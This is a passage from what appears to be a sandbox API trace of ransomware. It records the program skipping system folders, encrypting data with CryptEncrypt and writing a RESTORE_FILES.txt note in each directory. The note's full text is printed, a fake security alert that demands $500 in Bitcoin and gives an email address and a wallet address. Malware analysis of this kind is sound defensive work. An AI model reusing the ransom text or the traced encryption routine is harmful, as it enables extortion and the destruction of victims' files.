HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\..") returned 93 [0090.090] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.090] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.090] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.090] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.090] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.090] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.090] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.090] lstrcmpiW (lpString1="65UX3YG0", lpString2="Windows") returned -1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="Program Files") returned -1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="Program Files (x86)") returned -1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="$Recycle.bin") returned 1 [0090.091] lstrcmpiW (lpString1="65UX3YG0", lpString2="System Volume Information") returned -1 [0090.091] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0") returned 99 [0090.091] lstrcmpW (lpString1="65UX3YG0", lpString2=".") returned 1 [0090.091] lstrcmpW (lpString1="65UX3YG0", lpString2="..") returned 1 [0090.091] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*") returned 101 [0090.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.091] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.091] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.091] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.091] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.091] lstrcmpiW (lpString1=".", lpString2="System Volume 
Information") returned -1 [0090.091] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\.") returned 101 [0090.091] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.091] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.091] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.091] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.091] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.091] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.091] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.091] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.091] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.092] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\..") returned 102 [0090.092] lstrcmpW (lpString1="..", 
lpString2=".") returned 1 [0090.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.092] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.092] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.092] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.092] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.092] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\RESTORE_FILES.txt") returned 117 [0090.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.093] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.093] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.093] lstrlenA (lpString="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") returned 684 [0090.093] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0090.093] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.093] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.093] CloseHandle (hObject=0x154) returned 1 [0090.093] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.093] lstrcmpiW (lpString1="AY721QDR", lpString2="Windows") returned -1 [0090.093] lstrcmpiW (lpString1="AY721QDR", lpString2="Program Files") returned -1 [0090.094] lstrcmpiW (lpString1="AY721QDR", lpString2="Program Files (x86)") returned -1 [0090.094] lstrcmpiW (lpString1="AY721QDR", lpString2="$Recycle.bin") returned 1 [0090.094] lstrcmpiW (lpString1="AY721QDR", lpString2="System Volume Information") returned -1 [0090.094] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR") returned 99 [0090.094] lstrcmpW (lpString1="AY721QDR", lpString2=".") returned 1 [0090.094] lstrcmpW (lpString1="AY721QDR", lpString2="..") returned 1 [0090.094] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*") returned 101 [0090.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.094] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.094] lstrcmpiW (lpString1=".", lpString2="Program 
Files") returned -1 [0090.094] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.094] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.094] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\.") returned 101 [0090.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.094] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.094] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.094] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.094] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.094] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.094] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\..") returned 102 [0090.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.094] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.094] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.094] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.094] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.095] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.095] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.095] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\RESTORE_FILES.txt") returned 117 [0090.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.095] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.095] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.096] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.096] WriteFile (in: hFile=0x154, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.096] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.096] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.096] CloseHandle (hObject=0x154) returned 1 [0090.096] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="Windows") returned -1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="Program Files") returned -1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="Program Files (x86)") returned -1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="$Recycle.bin") returned 1 [0090.096] lstrcmpiW (lpString1="DZBKZBIC", lpString2="System Volume Information") returned -1 [0090.096] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC") returned 99 [0090.096] lstrcmpW (lpString1="DZBKZBIC", lpString2=".") returned 1 [0090.096] lstrcmpW (lpString1="DZBKZBIC", lpString2="..") returned 1 [0090.096] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*") returned 101 [0090.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\*", 
lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.096] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.096] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.096] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.097] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\.") returned 101 [0090.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.097] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.097] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.097] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.097] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.097] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.097] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.097] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.097] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.097] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\..") returned 102 [0090.097] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.097] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.097] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.097] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.097] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.097] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\RESTORE_FILES.txt") returned 117 [0090.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.098] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.098] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.098] lstrlenA (lpString="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") returned 684 [0090.098] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.098] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.099] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
